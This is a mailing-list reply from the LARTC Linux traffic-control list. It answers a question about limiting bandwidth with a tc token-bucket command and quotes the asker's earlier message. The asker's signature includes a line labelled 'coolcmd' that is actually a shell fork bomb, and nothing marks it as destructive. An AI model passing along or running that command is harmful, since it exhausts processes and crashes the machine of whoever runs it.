Try: tc qdisc add dev eth1 root tbf rate 10kbit buffer 5kb/8 limit 10kb This adds an token bucket flow qdisc to eth1 and limits traffic to 10kbit/s. Note: It only limits outgoing traffic, not incomming traffic. Regards Daniel -----Ursprungligt meddelande----- Från: lartc-admin@xxxxxxxxxxxxxxx [mailto:lartc-admin@xxxxxxxxxxxxxxx]För Thomas Habets Skickat: Wednesday, November 22, 2000 5:35 PM Till: daniel@xxxxxxxxxxxx; lartc@xxxxxxxxxxxxxxx Ämne: Re: [LARTC] Bandwidth limiting (I got this answer from the archives, I have not received it by mail. Odd) >What doesn't work? Do you get error messages when you run TC or don't you >know how to use TC? I don't know how to use TC, which got me to read tutorials and try things for hours and hours. Nothing I've tried limits bandwidth. --------- typedef struct me_s { char name[] = { "Thomas Habets" }; char email[] = { "thomas@xxxxxxxxxxxx" }; char kernel[] = { "Linux 2.2" }; char *pgpKey[] = { "finger -m thompa@xxxxxxxxxxxxxx" }; char pgpfinger[] = { "6517 2898 6AED EA2C 1015 DCF0 8E53 B69F 524B B541" }; char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" }; } me_t; _______________________________________________ LARTC mailing list / LARTC@xxxxxxxxxxxxxxx http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://ds9a.nl/2.4Routing/